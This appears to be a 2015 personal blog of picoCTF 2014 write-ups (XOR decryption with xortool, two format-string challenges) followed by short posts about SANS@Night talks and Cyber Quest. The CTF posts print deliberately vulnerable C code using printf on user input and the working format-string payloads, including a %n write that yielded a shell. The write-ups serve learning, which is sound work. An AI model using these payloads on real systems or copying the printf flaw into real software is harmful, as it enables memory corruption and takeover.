Wednesday, June 24, 2015

Picoctf 2014 Repeating XOR

I wasn't exactly sure how to approach this one, given that I don't have a lot of experience with XORing.  I think that I understand the basic idea of it.  Hex Plain Text XOR Hex Key = Hex Encoded Data.  If you know hex plain text, and you have the hex encoded version of that same hex plain text, then you should theoretically get the hex key of that data by XORing the hex plaintext with the hex encoded data of that same plaintext.  Then you can use that key to break the rest of this encoding.  This is kind of what Alan Turing did to break the enigma cipher.  He used plain text and the encrypted text of that plain text to find the key.  

I was reading about Hamming Distance.  From what I understand, the key length can be guessed fairly accurately by comparing each hex pair.  If the hex pairs are of similar Hamming Distances, then they are most likely encoded with the same hex pair.  So, if they were 10 characters apart, then the key length is 10.  I need to do further reading about this and experiment with it to see if I can better understand it.

After searching Google for a while, I stumbled upon a tool called "XorTool" on GitHub.  I'm using VM's, so I downloaded, scanned, and installed it.  Then I set about learning how to use it.  I was given the hint that the key length may be 10.  I was also told that the plaintext was a "history of cryptography", so I had a good idea of what I was looking for.  I let the tool do the work for me.  I just typed, xortool -x -l 10 encrypted.  -x told the program that the file was hex encoded, -l told the program that I was guessing a key length of 10, and encrypted was the name of the encrypted file.  It guessed that the most likely length was 10.  So then I ran the following command and got the following output.

$ xortool -x -o encrypted
The most probable key lengths:
   2:   9.7%
   5:   14.5%
   8:   7.2%
  10:   20.7%
  12:   6.0%
  15:   8.9%
  20:   12.8%
  25:   5.7%
  30:   8.5%
  40:   6.1%
Key-length can be 5*n
100 possible key(s) of length 10:
\x94\xd6\xb1\xc2\xbc\t\x05\xd6\x1c6
\x95\xd7\xb0\xc3\xbd\x08\x04\xd7\x1d7
\x96\xd4\xb3\xc0\xbe\x0b\x07\xd4\x1e4
\x97\xd5\xb2\xc1\xbf\n\x06\xd5\x1f5
\x90\xd2\xb5\xc6\xb8\r\x01\xd2\x182
...
Found 51 plaintexts with 95.0%+ printable characters
See files filename-key.csv, filename-char_used-perc_printable.csv

After this, I read filename-char_used-perc_printable.csv.  This gave me a decent idea of which keys were correct, because it told me the percentage of the characters in each potential key that were printable.  Xortool saves possible plain text files as out files.  I navigated to the folder that contains these out files.  I just used cat <numberIwasinterestedin>.out in my terminal, and it printed out the out file.  I only printed the texts with 100 percent printable characters.  There were only 7, so it made finding the correct decrypted file really easy.

$cat 94.out
your flag is: ab2614e35e828a602c50ebc9b0f5d710e2312388

On 17 March 1975, the proposed DES was published in the Federal Register. Public comments were requested, and in the following year two open workshops were held to discuss the proposed standard. There was some criticism from various parties, including from public-key cryptography pioneers Martin Hellman and Whitfield Diffie, citing a shortened key length and the mysterious "S-boxes" as evidence of improper interference from the NSA. The suspicion was that the algorithm had been covertly weakened by the intelligence agency so that they - but no-one else - could easily read encrypted messages. Alan Konheim (one of the designers of DES) commented, "We sent the S-boxes off to Washington. They came back and were all different." The United States Senate Select Committee on Intelligence reviewed the NSA's actions to determine whether there had been any improper involvement. In the unclassified summary of their findings, published in 1978, the Committee wrote:

    In the development of DES, NSA convinced IBM that a reduced key size was sufficient; indirectly assisted in the development of the S-box structures; and certified that the final DES algorithm was, to the best of their knowledge, free from any statistical or mathematical weakness.

However, it also found that

    NSA did not tamper with the design of the algorithm in any way. IBM invented and designed the algorithm, made all pertinent decisions regarding it, and concurred that the agreed upon key size was more than adequate for all commercial applications for which the DES was intended.

Another member of the DES team, Walter Tuchman, stated "We developed the DES algorithm entirely within IBM using IBMers. The NSA did not dictate a single wire!" In contrast, a declassified NSA book on cryptologic history states:

    In 1973 NBS solicited private industry for a data encryption standard (DES). The first offerings were disappointing, so NSA began working on its own algorithm. Then Howard Rosenblum, deputy director for research and engineering, discovered that Walter Tuchman of IBM was working on a modification to Lucifer for general use. NSA gave Tuchman a clearance and brought him in to work jointly with the Agency on his Lucifer modification."

and

    NSA worked closely with IBM to strengthen the algorithm against all except brute force attacks and to strengthen substitution tables, called S-boxes. Conversely, NSA tried to convince IBM to reduce the length of the key from 64 to 48 bits. Ultimately they compromised on a 56-bit key.

Some of the suspicions about hidden weaknesses in the S-boxes were allayed in 1990, with the independent discovery and open publication by Eli Biham and Adi Shamir of differential cryptanalysis, a general method for breaking block ciphers. The S-boxes of DES were much more resistant to the attack than if they had been chosen at random, strongly suggesting that IBM knew about the technique in the 1970s. This was indeed the case; in 1994, Don Coppersmith published some of the original design criteria for the S-boxes. According to Steven Levy, IBM Watson researchers discovered differential cryptanalytic attacks in 1974 and were asked by the NSA to keep the technique secret. Coppersmith explains IBM's secrecy decision by saying, "that was because [differential cryptanalysis] can be a very powerful tool, used against many schemes, and there was concern that such information in the public domain could adversely affect national security." Levy quotes Walter Tuchman: "[t]hey asked us to stamp all our documents confidential... We actually put a number on each one and locked them up in safes, because they were considered U.S. government classified. They said do it. So I did it". Bruce Schneier observed that "It took the academic community two decades to figure out that the NSA 'tweaks' actually improved the security of DES."

Picoctf 2014 Guess

On this problem, I had to guess a random 32 bit integer.  I had 2^32 chance of getting it right, making it very unlikely that I would actually be able to guess the number.
I studied the source program, which was written in C, and noticed that the "fgets(name, sizeof(name), stdin);" part of it was exploitable by a format string vulnerability.  I noticed that the variable that I
wanted, f, was the fourth integer on the stack.  So, when the program asked my name, I typed in %d.%d.%d.%d, and it printed four numbers that were separated by periods so that I could read them more easily.  When it asked me to type in my guess,
I typed in the fourth number that had printed out, and got the flag:  leak_the_seakret.

#include <stdio.h>
#include <stdlib.h>

char *flag = "~~FLAG~~";

void main(){
    int secret, guess;
    char name[32];
    long seed;

    FILE *f = fopen("/dev/urandom", "rb");
    fread(&secret, sizeof(int), 1, f);
    fclose(f);

    printf("Hello! What is your name?\n");
    fgets(name, sizeof(name), stdin);

    printf("Welcome to the guessing game, ");
    printf(name);
    printf("\nI generated a random 32-bit number.\nYou have a 1 in 2^32 chance of guessing it. Good luck.\n");

    printf("What is your guess?\n");
    scanf("%d", &guess);

    if(guess == secret){
        printf("Wow! You guessed it!\n");
        printf("Your flag is: %s\n", flag);
    }else{
        printf("Hah! I knew you wouldn't get it.\n");
    }
}

$ nc vuln2014.picoctf.com 4546
\Hello! What is your name?
%d.%d.%d.%d
Welcome to the guessing game, \32.-143668192.162005000.-857849444

I generated a random 32-bit number.
You have a 1 in 2^32 chance of guessing it. Good luck.
What is your guess?
-857849444
Wow! You guessed it!
Your flag is: leak_the_seakret

Monday, June 22, 2015

Picoctf 2014 Format String

I just completed the format string problem.  I took a semester of C a long time ago, but I remembered enough to know what was going on in the program that I was given to exploit.  I used gdb -q ./format, then p &secret to find the location of the variable of secret in memory.  Then I ran the program:

./format $(python -c 'print "%x.%x.%x"').

%x prints addresses in the stack.  I put a dot between them so that I could see where each ended. I kept adding a %x. until I found the address that I needed.  I found out that the 7th address was the address that I needed.  It was 0x0804a030.  The hint said that %n would be useful.  I tried it, but I just couldn't get it to work correctly.  Then I found some nice articles that helped to explain format string vulnerabilities fairly well.  They were:  http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html, and https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf.  So then I ran the program with ./format $(python -c 'print "%1337x%7$n"').  The %1337x pads an unsigned hexidecimal integer with 1337 spaces.  The %7$n specifies that I want the 7th address location, and n means that I want to write the number of bytes written so far to that place in memory.  I got shell.  Then I typed "cat flag.txt" and got the flag which was who_thought_%n_was_a_good_idea?

Wednesday, June 17, 2015

SANS@Night

My spouse was kind enough to request that I get a badge so that I could attend some SANS@night presentations.  I've only been to two, because there are many of them that my spouse would like to attend, and someone has to watch the kids.

The first one that I attended was a SANS WIT presentation.  Their hash tag is #SANS_WIT.  It was a networking event for women to meet other women in technology, and to learn about SANS programs that may help women.  I can't discuss specifically what was in the presentation, but suffice it to say, if you are a woman, interested in the IT field, you may want to attend one of these presentations.  I felt awkward.  I'm a stay at home mom listening to ladies say, "I'm the Chief Security Officer at ...". They asked what I did.  I feel like I probably sounded like a country bumpkin.  "I'm just a stay at home mom who has done a couple consulting/contract jobs from home, and I do pen-testing/digital forensics challenges for fun."  I told them that I was invited to an invite only cyber camp in my state.  It didn't help that I had recently lost some weight, so I was wearing pants and a shirt that was hanging off of me.  Those were my issues, though, not the other ladies.  They seemed like nice people.

The second one was Securing Your Kids.  Most of the information was common sense practices that most people would do, but there were some insightful ideas given by other parents, so it may be worth attending.  I was tempted to skip this one and attend more technical presentations.

Tuesday, June 16, 2015

Cyber Quest

I can't give the answers to Cyber Quest.  They may reuse the questions.  I did do Cyber Quest, though.  http://uscc.cyberquests.org. This year's challenge focused on secure programming practices in some popular programming languages.  I did well enough that I have been invited to a invite only cyber camp in my state.  I'm looking forward to it, but I'm slightly nervous.  It will be in an area that I'm not really familiar with.  I'm doing research about how to get around, and about the crime in the area.  I wish that I knew more people so that I could hitch a ride with someone and let them figure out the details.  I'm also nervous about how little I know compared to others.  My spouse, who is attending SANS Fire, quoted John Strand to try and convince me that things should be okay.  John Strand says that there will always be someone smarter than you are, but you shouldn't let that deter you from trying.